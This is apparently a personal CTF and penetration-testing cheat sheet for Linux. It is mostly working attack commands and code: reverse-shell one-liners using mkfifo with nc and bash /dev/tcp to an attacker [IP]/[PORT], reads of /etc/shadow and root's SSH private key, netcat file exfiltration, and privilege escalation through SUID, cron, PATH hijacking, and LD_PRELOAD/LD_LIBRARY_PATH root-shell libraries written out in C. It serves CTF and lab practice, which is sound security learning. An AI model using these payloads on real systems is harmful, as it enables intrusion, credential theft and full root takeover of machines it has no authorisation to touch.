---
title: CTF Hunter
date: 2022-10-04T09:00:00Z
draft: false
type: note
author: Kaptan
category: Cyber Security
subcategory: CTFs
weight: 1
tags:
  - ctf
  - penetration-testing
  - security
  - network
  - privilege-escalation
---

## Network exploration & port scan

```zsh
rustscan -a [IP]
```

```zsh
nmap -p- -T4 [IP]
```

```zsh
nmap -p[PORT(s)] -A -sS -sV -sC -Pn -vv -T4 [IP/URL]
```

## Web fuzzing and directory content discovery

```zsh
dirsearch -u [IP/URL]
gobuster dir [IP/URL] -w [wordlist] -x php,html,txt -t 150
gobuster vhost [IP/URL] -w [wordlist] -t 150
```

```zsh
ffuf -w [wordlist] -u http://[IP/URL]/FUZZ -fs 0
ffuf -X POST -w [wordlist] -u 'http://[IP/URL]/api/items?FUZZ=foo'
```

```zsh
wfuzz -X POST -w [wordlist] --hh 45 http://[IP/URL]/api/items?FUZZ=foo
wfuzz -c -w [wordlist] -u [IP/URL] -H "Host: FUZZ.[domain]" --hw 914
```

```zsh
feroxbuster --url [IP/URL] --wordlist [wordlist]
feroxbuster --url [IP/URL] --wordlist [wordlist] \
    --extensions php,txt,html --statuscodes 200,301,403
```

## Other scans

```zsh
wpscan --url [IP/URL] -e at,au,ap
nikto -h [IP/URL]
```

## Linux Reconnaissance

```zsh
id; whoami; pwd; hostname; uname -a; lsb_release -a; hostnamectl | grep Kernel
ls -al /etc/passwd /etc/shadow
cat /etc/issue /etc/*release /etc/group /proc/version /root/.ssh/id_rsa
/bin/bash --version
sudo -l
```

```zsh
whois [domain]
host [domain]
whois [IP] | grep "OrgName"
nslookup [domain]
traceroute [domain]
dnsenum --server [domain]
dnsrecon -d [domain]
dig [domain]
wafw00f [domain]
whatweb [www/https-domain]
fierce -dns [domain] -wordlist [wordlist]
urlcrazy domain (benzer siteleri bulur)
```

```zsh
mkpasswd -m sha-512 [newpasswordhere] # [change shadow]
openssl passwd [newpasswordhere] # [change passwd(x)]
```

## System File Locations and Descriptions

| Location | Description 
|----------|-------------
| /etc/issue | Contains a message or system identification to be printed before the login prompt.|
| /etc/profile | Controls system-wide default variables, such as export variables, file creation mask (umask), terminal types, and mail messages to indicate when new mail has arrived. |
| /proc/version | Specifies the version of the Linux kernel. |
| /etc/passwd  | Contains information about all registered users who have access to the system.     |
| /etc/shadow  | Contains information about the system's users' passwords. |
| /root/.bash_history | Contains the command history for the root user.  |
| /var/log/dmesg | Contains global system messages, including messages logged during system startup. |
| /var/mail/root | Stores all emails for the root user. |
| /root/.ssh/id_rsa   | Stores private SSH keys for the root user or any other valid user on the server.   |
| /var/log/apache2/access.log | Contains logs of accessed requests for the Apache web server. |
| C:\boot.ini  | Contains boot options for computers with BIOS firmware (Windows). |

By understanding the functions and locations of these system files, administrators can effectively manage and troubleshoot system configurations and operations.


## Get A Proper Shell (TTY Shell Stabilization Process)

```zsh
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
SHELL=/bin/bash script -q /dev/null
/usr/bin/script -qc /bin/bash /dev/null
script /dev/null -c bash
perl —e 'exec "/bin/sh";'
perl: exec "/bin/sh";
echo os.system('/bin/bash')
/bin/sh -i
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
IRB: exec "/bin/sh"
vi: :!bash
vi: :set shell=/bin/bash:shell
nmap: !sh
```

```zsh
CTRL + Z
stty size
stty raw -echo; fg
ENTER
reset
export TERM=xterm256-color
export SHELL=bash
stty cols 130 rows 34
```

## How to add your id_rsa.pub to /home/user/.ssh/authorized_keys

{{< figure src="/img/notes/cyber-security/ctfs/ctf-hunter-1.png" alt="ctf hunter commands" loading="lazy" width="70%" height="auto" >}}

{{< figure src="/img/notes/cyber-security/ctfs/ctf-hunter-2.png" alt="ctf hunter commands" loading="lazy" width="70%" height="auto" >}}

**Copy the key and paste into box:**

{{< figure src="/img/notes/cyber-security/ctfs/ctf-hunter-3.png" alt="ctf hunter commands" loading="lazy" width="70%" height="auto" >}}

{{< figure src="/img/notes/cyber-security/ctfs/ctf-hunter-4.png" alt="ctf hunter commands" loading="lazy" width="70%" height="auto" >}}

## File Transfer Methods

**Local:**

```zsh
# on the receiving end run 
nc -l -p <PORT> > <FILENAME>
nc -l -p 1234 > ./archive.tar
```

**Target:**

```zsh
# to send the file 
nc -w 3 <TARGET_IP> <PORT> < <FILENAME>
nc -w 3 [IP] 1234 < ./archive.tar
```

## Elevation of Privilege(EoP)

```zsh
cp /home/[username]/myfiles/* /opt/backupfiles
echo "/bin/bash" > /tmp/cp
chmod +x /tmp/cp
export PATH=/tmp:$PATH
./backup
# or
echo '/bin/bash -p' > cp
chmod 777 cp
export PATH=/home/[username]/[PATH]:$PATH
echo $PATH
```

## Shell www-data to user

```zsh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc [IP] [PORT] >/tmp/f
# or
bash -c "exec bash -i >& /dev/tcp/[IP]/[PORT] 0>&1"
mv backup.sh old_script && mv new backup.sh && chmod +x backup.sh
nc -nvlp [PORT]
```

- https://gtfobins.github.io/gtfobins/bash/#reverse-shell
- https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
- https://payatu.com/guide-linux-privilege-escalation
- https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
- https://opensource.com/article/20/4/linux-binary-analysis

## Which program has SUID/SGID

```zsh
find / -user root -perm -4000 -ls 2>/dev/null
find / -user root -perm /4000
find / -user root -perm -4000 -exec ls -ldb {} \;
find / -user root -perm -4000 -exec ls -ldb {} \; 2>>/dev/null | grep "/bin"
find / -type f -user root -perm -4000 -exec ls -ldb {} \; 2>>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
find / -perm /4000 2>/dev/null
find -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# then
ltrace [file_path]
```

- [GTFOBins](https://gtfobins.github.io/)

```zsh
ps aux | grep "^root" # root da çalışan programları listeler
sudo find /bin -name nano -exec /bin/sh \;
sudo awk 'BEGIN {system("/bin/sh")}'
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse
sudo vim -c '!sh'
sudo -l
sudo -u#-1 [app] [file]
sudo -u [user]

# Note: you have to look for all of them. Exp:
/usr/bin/system-control
```

## Setuid & Setgid Programs

**shell.c:**

```c
#include <stdio.h>
#include <stdlib.h>
int main()
{
   setgid(0);
   setuid(0);
   system("/bin/bash");
   return 0;
}
```

## Cron Job Attacks

```zsh
cat /etc/crontab
```

```zsh
#!/bin/bash

bash -i >& /dev/tcp/[IP]/[PORT] 0>&1
```

```zsh
#!/bin/bash

cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash

chmod +x /home/user/overwrite.sh
/tmp/rootbash -p
```

## Sudo Privileges

```zsh
sudo -l
```

**preload.c:**

```c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setresuid(0,0,0);
    system("/bin/bash -p");
}

gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c
sudo LD_PRELOAD=/tmp/preload.so program-name-here
```

## LD_LIBRARY_PATH Attacks

**library_path.c:**

```c
#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
    unsetenv("LD_LIBRARY_PATH");
    setresuid(0,0,0);
    system("/bin/bash -p");
}

ldd /usr/sbin/apache
gcc -fPIC -shared -o /tmp/libcrypt.so.1 /home/user/tools/sudo/library_path.c 
sudo LD_LIBRARY_PATH=/tmp apache2
```

## Manipulate the PATH

```zsh
echo $PATH
/usr/sbin
sudo -u root /home/user/Desktop/app
cat > /usr/sbin/python << EOF
#!/bin/bash
/bin/bash
EOF
chmod +x /usr/sbin/python
/bin/bash -p
```

## Other Commands

```zsh
netstat -punta
netstat -ano
```

## Shell Examples

- https://www.revshells.com/

## Automation Tools

- **CTF Tools:** https://github.com/zardus/ctf-tools 
- **linPEAS:** https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
- **LinEnum:** https://github.com/rebootuser/LinEnum
- **pspy[x32/x64]:** https://github.com/DominicBreuker/pspy
- **LES (Linux Exploit Suggester):** https://github.com/mzet-/linux-exploit-suggester
- **Linux Smart Enumeration:** https://github.com/diego-treitos/linux-smart-enumeration
- **Linux Priv Checker:** https://github.com/linted/linuxprivchecker


## Checklists

- [PayloadsAllTheThings | Linux - Privilege Escalation](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md#linux---privilege-escalation)
- https://payatu.com/guide-linux-privilege-escalation
- https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/


## Resources

- [Linux Path hijacking](https://vk9-sec.com/privilege-escalation-linux-path-hijacking/)
- [Penetration Testing on Memcached Server](https://www.hackingarticles.in/penetration-testing-on-memcached-server/)

